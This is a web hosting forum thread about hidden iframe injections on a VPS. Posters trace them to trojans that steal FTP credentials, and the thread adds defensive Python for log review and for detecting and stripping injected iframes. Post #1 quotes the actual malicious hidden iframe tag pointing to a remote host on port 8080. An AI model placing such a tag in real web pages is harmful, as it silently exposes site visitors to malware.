Page 1 of 2 (results 1 to 25 of 32)
  1. #1
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47

    iframe injection attack

    Hi, I need help understanding the iframe injection attack and how it is performed by the hacker, and furthermore how it affects different accounts on my VPS - The reason I need to know is below:

    I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:

    Subject: Malware notification regarding *************.com
    Date: 01/09/2009 19:07:08 GMT Daylight Time
    From: noreply@google.com
    Reply To:
    To: abuse@*************.com, admin@*************.com, administrator@*************.com, contact@*************.com, info@*************.com, postmaster@*************.com, webmaster@*************.com
    Sent from the Internet (Details)

    Dear site owner or webmaster of *************.com,

    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://************* .com/
    http://www.************* .com/

    Here is a link to a sample warning page:
    http://www.google.com/interstitial?u...*********.com/

    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser


    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    StopBadware.org - Tips for Cleaning & Securing Your Website

    Once you've secured your site, you can request that the warning be removed by visiting
    My site's been hacked - Webmasters/Site owners Help
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.

    Sincerely,
    Google Search Quality Team

    This site did not contain spyware (that I knew of), so I did an audit by date modified via FTP to see if any files had been hacked. Checking the recently modified files, I discovered they did contain an iframe:

    Do not visit the URL (as it contains a virus)
    <iframe src="http://u7n.ru:8080/index.php" width=177 height=158 style="visibility: hidden"></iframe>
    I removed the above code from one of my sites, then proceeded to check the others; all contain the above code or similar code (a different URL). All index.(xxxx) files on affected accounts have had the above JavaScript inserted.

    What I need to know is: how did they get in, and how do I prevent this from happening again? Because if I put these files back from backups, they will just be open to exploit again.

    I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:

    We are sorry to hear that you are facing this problem. This kind of attack is known as an iframe injection attack, which only affects the index.xxx files. This is caused either due to weak FTP passwords or due to some vulnerability in the scripts. As you said the passwords are strong, the latter one can be the cause in your case. Still, I recommend you reset all the passwords of the accounts and then audit them.

    I am certain they don't have my password as I have RoboForm and never manually enter passwords or use my hosting passwords elsewhere; besides, my hosting passwords are 'strong' (but I will be changing them all in case).

    So I suspect they may have inserted the code via a vulnerability in one of the scripts.

    However if one script was vulnerable say for instance (vBulletin or phpbb) on one account/site on the VPS:

    1. Then how did they modify and insert code into other sites/accounts on the VPS that were not using the script?
    2. Why were some accounts not affected by the ‘iframe injection attack’?
    3. What is the best way to find out exactly where the vulnerability is and how the hacker did what they did?
    4. Any other security advice or ways to 'lockdown' a VPS?


    I really need help understanding this as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I’m not host savvy at all.

    Just removing this simple insertion into each index file is an enormous task due to the amount of accounts and index files, not to mention my visitors getting viruses.

    The only good thing that happened was Google informed me of the attack and very quickly (ie 1 day) - The price to pay, Google labeling my sites as badware.

  2. #2
    Join Date
    Nov 2002
    Posts
    62
    Search!

    I've replied to numerous threads in here...

    Same issue

  3. #3
    Join Date
    Jul 2007
    Posts
    2,051
    Much has been said and discussed on this topic, however, there is no concrete way found to detect the exact cause. I have a customer who has done everything in the textbooks and still his websites are getting infected and the server is not vulnerable as there are no websites other than his websites getting infected. How do we find out how the iframe got injected in the pages?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  4. #4
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47
    I have researched the iframe injection attack on the web and discovered that a virus named Kriptik (sp) infects PCs, then sends the FTP login info (from the FTP program) to a remote machine to access the sites and then injects the code.

    I was aware that a few days ago I had a major infection on my PC, it was that bad that I could not even get windows to load even in safe mode, eventually I had to repair windows XP 3 times. Then I spent two days finding the spyware, just got clean today.

    So when I found my sites hacked I was extremely unhappy as it happened twice, in reality it happened once!

    So as careful as I am with passwords, they still got them due to a PC virus.


    Whilst typing this all sites that I cleared are now reinfected again, more notices from Google about badware, so now I know the cause I can get to work and stop this dead.

    Thanks for your replies.

  5. #5
    Join Date
    Jul 2007
    Posts
    2,051
    I have found an excellent solution against Gumblar attacks. Visit http://www.oxio.net/anti_gumblar/. Can't wait to try it.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  6. #6
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    222
    The three character domain followed by either .ru, .kw, .cn or any other TLDs, followed by a port designation (:8080) have been the result of compromised FTP credentials.

    photoshopfreak is correct. It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

    It works in a variety of ways.

    First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

    The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

    Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

    Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

    Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

    The best way I've found to combat this is by following these steps:

    Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

    Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down. At this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

    Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea whose PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

    Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes, you'll have to type in the new password, but hopefully you've already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website, not just index files or just html files. Check every file on your website, even .js and .css files.

    Step 5: Change your FTP passwords again.

    Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label in dark background that says, "This site may be distributing malware. More Details" (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

    Then you should have that issue again.

    This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on a PC with FTP access to the infected website.

    If you have further questions regarding this, post here and I'll try to help.

  7. #7
    - Clamscan on your server can help you find which files are already infected.
    - There are a few mod_security rules at gotroot that prevent these iframe attacks to a great extent.
    - Maintain daily and weekly backups for your accounts, as the only possible way to recover from an iframe attack is backups.
    - Secure your local computer with an antivirus - I use Avira AntiVir on Windows, a good one till now.
    - Do not store any passwords - particularly FTP - on your local computer.

    If you have already cleaned and secured your site, try contacting StopBadware.
    Windows VPS | Linux Hybrid Server | 99.9% Uptime
    http://www.odishahosting.com ( USA DC)
    http://www.odishahosting.in ( INDIA DC)

  8. #8
    Join Date
    Jul 2007
    Posts
    2,051
    Quote Originally Posted by WeWatch View Post (post #6 above, quoted in full)
    I think this is the best explanation provided to understand and prevent the iframe attacks problem.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  9. #9
    Join Date
    Sep 2007
    Posts
    369


    Quote Originally Posted by photoshopfreak View Post

    Whilst typing this all sites that I cleared are now reinfected again, more notices from Google about badware, so now I know the cause I can get to work and stop this dead.
    Also install some good antivirus and set up an hourly or once-a-day scan of your web directories that sends an email report to you, so you can check the details and know in time which site or file got infected, rather than Google launching a malware warning on your website.
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee

  10. #10
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    While you clean up your server (again), you can disable ftp or change all user passwords, and make them prove they are clean before allowing ftp access again. Looking through logs should allow you to determine which ftp accounts are compromised.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)
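    The log review suggested above, as an added example that is not from any poster in this thread: it reads an FTP transfer log in xferlog format (the wu-ftpd/proftpd layout is assumed; check your own server's format), lists completed uploads per FTP account and source address, flags uploads from addresses outside each owner's usual networks, and shows which outside address hit more than one account. The log lines and the KNOWN_SOURCES networks are constructed for the demo.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# xferlog line = 5 timestamp tokens followed by these 13 fields (wu-ftpd /
# proftpd layout; assumed here, check your server's format).
FIELD_NAMES = ["xfer_time", "remote_host", "size", "filename", "type", "special",
               "direction", "mode", "user", "service", "auth", "auth_uid", "status"]

def parse_xferlog(lines):
    """Yield one dict per well-formed line; direction 'i' is an upload, 'o' a download."""
    for line in lines:
        parts = line.split()
        if len(parts) < 18:
            continue                      # blank or truncated line
        rec = dict(zip(FIELD_NAMES, parts[5:18]))
        rec["timestamp"] = " ".join(parts[:5])
        yield rec

def uploads_by_account(records):
    """user -> {remote_host -> [files]} for completed uploads only."""
    out = defaultdict(lambda: defaultdict(list))
    for r in records:
        if r["direction"] == "i" and r["status"] == "c":
            out[r["user"]][r["remote_host"]].append(r["filename"])
    return out

def suspicious_uploads(uploads, known_sources):
    """(user, host, files) for uploads from outside the account's usual networks.

    A stolen credential is a valid login, so the password itself tells you
    nothing; a login from an address the owner never uses is the signal."""
    flagged = []
    for user, by_host in uploads.items():
        nets = [ip_network(n) for n in known_sources.get(user, ())]
        for host, files in by_host.items():
            try:
                addr = ip_address(host)
            except ValueError:            # hostname logged; cannot match a network
                flagged.append((user, host, files))
                continue
            if not any(addr in net for net in nets):
                flagged.append((user, host, files))
    return flagged

def hosts_hitting_multiple_accounts(flagged):
    """Remote hosts that uploaded into more than one account: one thief, many
    sites, which is how unrelated accounts on one VPS get hit at once."""
    accounts = defaultdict(set)
    for user, host, _ in flagged:
        accounts[host].add(user)
    return {h: sorted(u) for h, u in accounts.items() if len(u) > 1}

# Constructed log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_XFERLOG = """\
Tue Sep  1 09:12:44 2009 1 198.51.100.7 2048 /home/siteone/public_html/news.html a _ i r siteone ftp 0 * c
Tue Sep  1 18:40:02 2009 1 203.0.113.55 5120 /home/siteone/public_html/index.php a _ i r siteone ftp 0 * c
Tue Sep  1 18:40:03 2009 1 203.0.113.55 3311 /home/siteone/public_html/index.html a _ i r siteone ftp 0 * c
Tue Sep  1 18:41:19 2009 1 203.0.113.55 4102 /home/sitetwo/public_html/index.php a _ i r sitetwo ftp 0 * c
Wed Sep  2 08:02:10 2009 2 198.51.100.7 22000 /home/siteone/public_html/index.php a _ o r siteone ftp 0 * c
"""
# Networks each account's owner is known to work from (assumed for the demo).
KNOWN_SOURCES = {"siteone": ["198.51.100.0/24"], "sitetwo": ["192.0.2.0/24"]}

def analyse(log_text=SAMPLE_XFERLOG, known=KNOWN_SOURCES):
    """Run the whole pipeline; return (flagged uploads, hosts shared across accounts)."""
    uploads = uploads_by_account(parse_xferlog(log_text.splitlines()))
    flagged = suspicious_uploads(uploads, known)
    return flagged, hosts_hitting_multiple_accounts(flagged)

if __name__ == "__main__":
    flagged, shared = analyse()
    for user, host, files in flagged:
        print(f"{user}: upload from {host} -> {', '.join(files)}")
    print("hosts hitting several accounts:", shared)
```

    Note that the fourth variant WeWatch describes (injection into the FTP data stream from the owner's own PC) shows up as uploads from the owner's usual address, so this check only catches the stolen-credential case.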

  11. #11
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47
    All threats already killed dead

  12. #12
    Join Date
    Jul 2007
    Posts
    2,051
    The real issue while scanning the website directories inside the server is that the infected files get quarantined instead of cleaning and it is difficult to find the exact file for a website from a bunch of quarantined files. Customers, usually, don't keep their websites' backups. Is there a solution which will just remove the iframe entry from the infected file?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  13. #13
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    The iframe injections aren't a virus (although they are caused by a user's workstation being compromised by a virus, more often than not), it's just code uploaded by the stolen ftp credentials, so AV really is useless anyway. About the only thing you can do is manually clean up the files, but most important, prevent them from happening in the first place by correct directory permissions (in the case of scripts being compromised) and sftp vs ftp. If you must use FTP, then you will have to watch users, and do something pro-active to warn end users of the threat, and require or strongly suggest they use a good AV.
    Aside from mail servers, AV on a server is usually not a good idea for just the reason you stated (in the case of real viruses).
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  14. #14
    Join Date
    Jul 2007
    Posts
    2,051
    One thing I have noticed in a few websites which are frequently being infected is that the permissions are correct. Also, I have suPHP installed which does not allow chmod 777. However, I think the stolen FTP credentials can still be used to infect the files. Please correct me if I am wrong.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  15. #15
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    Correct, the most common cause of the iframe injections lately are infected client computers...the virus steals the ftp credentials, then uploads the iframe files directly to their server, usually infecting the most common index files. So you are right, in this case, server permissions don't matter. They do matter on the variants that take advantage of 777 upload directories, so both are really important to prevent the injections.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  16. #16
    Join Date
    Sep 2007
    Posts
    369


    Quote Originally Posted by prashant1979 View Post
    The real issue while scanning the website directories inside the server is that the infected files get quarantined instead of cleaning and it is difficult to find the exact file for a website from a bunch of quarantined files. Customers, usually, don't keep their websites' backups. Is there a solution which will just remove the iframe entry from the infected file?
    Hi Prashant,

    It will not quarantine; you need to use the software accordingly and display only the infected files. You need to write the script properly so it records the relevant files and just displays them. Then you will get the list of files that have the problem, and they can easily be restored from backup or have the relevant tags removed.

    True, clients don't keep their backups, but it's good if someone tells them and guides them properly, or a good hosting company always takes backups whether the client takes their own or not. When a client's site gets malware they will understand the meaning of backup, why backup is important. I always keep my clients' backups at a different co-location, so whenever something happens it takes me hardly one hour to restore the relevant things from backups. Result: the client is happy as well.

    I have worked a lot on this topic and done a lot of research. Maybe you will clean some files one way or another, but the infection is getting more intelligent day by day, so it's not easy to clean up automatically, and because of this someone might lose the client's original site data. This iframe penetrates over time; initially it starts from one or two pages. If virus scanning is properly set up, the system admins of the relevant company get notified in time, so they will check the relevant logs and other necessary things; it will stop the iframe penetrating other pages, and we get the cause of the problem: where, why and when it occurs.
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee
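    The file-level clean-up asked about in post #12 and described in post #16 (list the infected files, then strip the tag or restore from backup), as an added example that is not from any poster: a scanner that walks a web root, including the .js and .css files WeWatch says to check, matches the hidden port-8080 iframe pattern quoted in this thread, and with fix=True removes the tag after copying the original file aside. The sample page contents and hostnames are constructed; the regex is tuned to the variant shown here and must be re-checked against whatever is actually found on a given server.

```python
from __future__ import annotations

import re
import shutil
import tempfile
from pathlib import Path

# The thread reports carriers beyond index.*; WeWatch's step 4 says to check
# .js and .css as well, so those are scanned too.
SCAN_SUFFIXES = {".html", ".htm", ".php", ".shtml", ".js", ".css", ".tpl"}

# The injection described in the thread: an <iframe> whose src is a host on
# port 8080 and which is hidden (visibility:hidden, display:none or a 0/1 px
# frame). Attribute order and quoting vary, so lookaheads are used.
INJECTED_IFRAME = re.compile(
    r"<iframe\b"
    r"(?=[^>]*\bsrc\s*=\s*[\"']?https?://[^\s\"'>]+:8080/)"
    r"(?=[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none"
    r"|width\s*=\s*[\"']?[01]\b))"
    r"[^>]*>\s*</iframe\s*>",
    re.IGNORECASE,
)

def find_injections(text: str) -> list[str]:
    """Return every injected iframe tag in one file's contents."""
    return INJECTED_IFRAME.findall(text)

def strip_injections(text: str) -> tuple[str, int]:
    """Remove injected iframes; return (cleaned text, number removed)."""
    return INJECTED_IFRAME.subn("", text)

def scan_tree(root: Path, fix: bool = False, backup_dir: Path | None = None) -> dict[str, int]:
    """Map each infected file (path relative to root) to its hit count.

    With fix=True the tag is removed in place, after the original has been
    copied under backup_dir so a wrong match can still be undone.  Files are
    handled as latin-1 so arbitrary bytes round-trip unchanged."""
    report: dict[str, int] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_bytes().decode("latin-1")
        hits = find_injections(text)
        if not hits:
            continue
        rel = path.relative_to(root).as_posix()
        report[rel] = len(hits)
        if fix:
            if backup_dir is not None:
                dest = backup_dir / rel
                dest.parent.mkdir(parents=True, exist_ok=True)
                shutil.copy2(path, dest)
            cleaned, _ = strip_injections(text)
            path.write_bytes(cleaned.encode("latin-1"))
    return report

# Constructed samples, not real sites: the hidden :8080 iframe quoted in the
# thread (host replaced), a 1-pixel variant, and a legitimate embed that must
# be left alone.
INFECTED = ('<body><iframe src="http://abc.example:8080/index.php" width=177 '
            'height=158 style="visibility: hidden"></iframe><h1>Home</h1>')
INFECTED_1PX = "<IFRAME src=http://xyz.example:8080/ width=1 height=1></IFRAME>"
BENIGN = '<iframe src="https://video.example/embed/42" width=560 height=315></iframe>'

def demo() -> dict[str, int]:
    """Build a throwaway web root from the samples, clean it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        root, backups = Path(tmp) / "public_html", Path(tmp) / "quarantine"
        (root / "js").mkdir(parents=True)
        (root / "index.php").write_text(INFECTED, encoding="latin-1")
        (root / "js" / "menu.js").write_text(INFECTED_1PX, encoding="latin-1")
        (root / "about.html").write_text(BENIGN, encoding="latin-1")
        report = scan_tree(root, fix=True, backup_dir=backups)
        assert scan_tree(root) == {}               # second pass is clean
        assert (backups / "index.php").exists()    # original kept for review
        return report

if __name__ == "__main__":
    for rel, count in demo().items():
        print(f"{rel}: {count} injected iframe(s) removed")
```

    Run it first without fix=True and read the report; as post #13 says, cleaning the files does nothing about the stolen credentials, so the password change and workstation clean-up still have to happen before the site is re-uploaded.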

  17. #17
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    222
    The other issue here is that many people are running to companies that will perform a vulnerability scan of your website. Some of these services will find a variety of vulnerabilities, some will not.

    The point here is that no vulnerability scanner in the world will find the real entry point of this exploit. It doesn't and it can't find the point of entry because the hacker is using a valid FTP account.

    So while many people are running around chasing down "holes" in their website, the hackers keep hacking their website because the vulnerability scanner just won't find the hole.

    You have to think of every point of entry, even stolen passwords.

    It's an endless circle at times.

  18. #18
    Join Date
    Jun 2008
    Location
    India
    Posts
    130
    Yes, that's right. Iframes commonly come in by taking advantage of 777-permission directories and files. You can find them easily by running the following commands; go to your public_html first.

    For Linux:

    find ./ -type f -perm 777
    find ./ -type d -perm 777

  19. #19
    Join Date
    Jul 2007
    Posts
    2,051
    Doesn't suPHP disable execution of scripts with the permission 777?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  20. #20
    For a couple of weeks my web site has been under iframe attacks. I have tried all the solutions: reinstalled my own PC, changed all passwords, cleaned all files of my web site, but it is attacked again and again.

    Then I changed the names of the files index.php and login.php and found that now the files don't contain the iframe.

    But after 5 days I found that now all other files are modified and contain iframe code in them. I'm sick of all this and could not find a solution which could save my files.
    Please help me with reasonable responses.

  21. #21
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    Quote Originally Posted by Saima View Post (post #20 above)
    If there are other users that upload to this server via FTP, they could be infected.
    If that is not the case, then try to think of any other computers you may have FTPed in with...if there are none, I would then suspect some script that has 777 perms set on some directory.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  22. #22
    One of the best ideas is to change your FTP password to a more critical and stronger one.

  23. #23
    Join Date
    Jul 2007
    Posts
    2,051
    Will FTP over TLS/SSL work to prevent the FTP passwords from being sniffed by the trojans?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  24. #24
    Yes. As per my knowledge, it will work.

  25. #25
    Join Date
    Nov 2001
    Location
    The South
    Posts
    5,408
    Quote Originally Posted by prashant1979 View Post
    Will FTP over TLS/SSL work to prevent the FTP passwords from being sniffed by the trojans?
    Won't do jack if it's a keylogger doing the sniffing. Also there are still sniffs that can happen between the time you type your password, and the time in which that password is encrypted and sent over the wire. So no it won't stop it but yes it will help.
    Gary Harris - the artist formerly known as Dixiesys
    resident grumpy redneck

